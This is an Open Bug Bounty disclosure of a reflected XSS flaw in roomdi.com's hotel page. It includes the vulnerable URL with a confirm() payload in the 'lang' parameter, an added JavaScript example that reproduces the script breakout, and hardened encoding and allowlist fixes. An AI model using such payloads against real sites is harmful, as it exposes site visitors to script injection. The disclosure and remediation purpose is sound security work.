roomdi.com XSS vulnerability

2017-12-01T10:33:00
ID OBB:446114
Type openbugbounty
Reporter Random_Robbie
Modified 2018-03-01T10:33:00

Description

Open Bug Bounty ID: OBB-446114

Description| Value
---|---
Affected Website:| roomdi.com
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS (Cross Site Scripting) / CWE-79
CVSSv3 Score:| 6.1 [CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N]
Remediation Guide:| OWASP XSS Prevention Cheat Sheet

Vulnerable URL:
http://www.roomdi.com/hotel/?lang=en%22%27--!%3E%3C/script/%3E%3CSvg/OnLoad=confirm`OPENBUGBOUNTY`%20//&check_in=11/12/2017&option=16&hotel=205026&utm_source=tripadvisor&client=tripadvisor&utm_medium=search&rooms=30,30&nswid=apdQT4jaFOiw7PxnGcFPcB2XvbVDmkPkw6FL/mpzQ2kP91NFCgx8eWnrhuHBJ7bvBxBBPtbdZJP4tb60LyZM7FC4c9KEyV08b8z+o0l//sHoam9KHVwsq82+JvexJTzLTwNf9JYLNxvG7O3keoKt+Cc7ZjuWpabkAg+LIRrL5S+kya6vNsxVqjiDVYqPgq3pdLSxeLb2hfvdKsnPPbDte3GHtje40TI9+ILfat2v4DRcodQLCXFOpwxgI1itde9XMv44H5ho0sJvnllWE82JX/IX/aUVMIjU94vd2Tglk5me2oQyr6jCD5JTglAiq51TE1YjcVMAJ4nhKuOkxFgPB2hQJ5jgAFbmbCsSqZcunON4xUVmNBZyteQCYwAVCW1E&sid=929fad6c-eb39-409d-aec0-a0c14ed2a324&check_out=12/12/2017&market=uk#stay
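
The payload in the `lang` parameter above (URL-decoded: `en"'--!></script/><Svg/OnLoad=confirm`OPENBUGBOUNTY` //`) is shaped to terminate a string literal, comment out the remainder of the line, close the enclosing `<script>` element and then inject an SVG with an event handler. The following is an added example, not code from the advisory or from roomdi.com: it assumes, purely for illustration, that the parameter is reflected into a JavaScript string literal inside a `<script>` block (the server-side code is not shown on this page), reproduces the breakout against that assumed template, and shows two hardened renderers that follow the OWASP XSS Prevention Cheat Sheet guidance for the JavaScript-data context (a strict allowlist, and context-correct encoding of the value). All function names are hypothetical.

```javascript
// Added example, not from the advisory. Models a page that reflects the
// `lang` query parameter into a <script> string literal (an assumption; the
// real roomdi.com template is not shown) and the defence for that context.

// The exact `lang` value from the advisory's URL, URL-decoded.
const PAYLOAD = decodeURIComponent(
  'en%22%27--!%3E%3C/script/%3E%3CSvg/OnLoad=confirm`OPENBUGBOUNTY`%20//'
);

// Vulnerable (assumed) template: raw concatenation into a JS string literal.
// `"` ends the literal, `--!>` is a comment-like filler, `</script/` ends the
// script element for the HTML parser, and the <Svg/OnLoad=...> then executes.
function renderVulnerable(lang) {
  return `<script>var lang = "${lang}";</script><div id="stay"></div>`;
}

// Context-correct encoding for a JS string literal inside <script>:
// JSON.stringify handles quotes/backslashes, but NOT `<` and `>`, so the HTML
// parser would still see `</script`; escape those (and U+2028/2029, which
// older engines treat as line terminators) as \uXXXX sequences.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

// Hardened variant 1: encoding only (sufficient for this context).
function renderEncoded(lang) {
  return `<script>var lang = ${jsStringLiteral(lang)};</script><div id="stay"></div>`;
}

// Hardened variant 2: allowlist (language tags like "en" or "en-GB") plus
// encoding, falling back to a default on anything unexpected.
const LANG_RE = /^[a-z]{2}(-[A-Z]{2})?$/;
function renderAllowlisted(lang, fallback = 'en') {
  const safe = LANG_RE.test(lang) ? lang : fallback;
  return `<script>var lang = ${jsStringLiteral(safe)};</script><div id="stay"></div>`;
}

// Check used by the test: the HTML tokenizer ends script data at `</script`
// followed by whitespace, `/` or `>`, so a second such token means the
// injected value escaped the script element; an injected <svg ...> tag
// outside the literal means markup got through.
function scriptBreakout(html) {
  const scriptEnds = (html.match(/<\/script[\s/>]/gi) || []).length;
  return scriptEnds > 1 || /<svg[\s/>]/i.test(html);
}

module.exports = { PAYLOAD, renderVulnerable, renderEncoded, renderAllowlisted, jsStringLiteral, scriptBreakout };
```

Encoding alone closes the reported hole because the value can no longer terminate the literal or the `<script>` element; the allowlist is the defence-in-depth layer a locale selector should have anyway, since there is no legitimate reason for `lang` to carry anything but a language tag.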
Coordinated Disclosure Timeline

Description| Value
---|---
Vulnerability Reported:| 1 December, 2017 10:33 GMT
Vulnerability Verified:| 4 December, 2017 06:03 GMT
Website Operator Notified:| 4 December, 2017 06:03 GMT
Vulnerability Published:| 4 December, 2017 06:03 GMT [without any technical details]
Public Disclosure:| 1 March, 2018 10:33 GMT